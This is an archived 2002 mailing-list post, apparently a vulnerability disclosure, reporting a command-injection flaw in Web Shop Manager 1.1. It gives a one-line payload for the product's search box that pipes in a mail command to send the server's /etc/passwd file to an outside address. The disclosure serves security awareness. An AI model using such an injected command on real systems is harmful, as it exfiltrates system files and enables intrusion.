Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Tacettin Karadeniz (tacettinkaradeniz_at_yahoo.com)
Date: Thu Aug 15 2002 - 05:15:37 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    The Web Shop
    allows you to manage a fully functional online store
    from a centralized web-based administration system. A
    security vulnerability in the product allows executing
    of arbitrary commands with the privileges of the
    script file used by the product.

    Vulnerable systems:
     * Web Shop Manager version 1.1

    It is possible to send server's password file any mail
    address by writing the following command in Web Shop
    Manager's search box:

     |mail userhost.com < /etc/passwd


    Do You Yahoo!?
    HotJobs - Search Thousands of New Jobs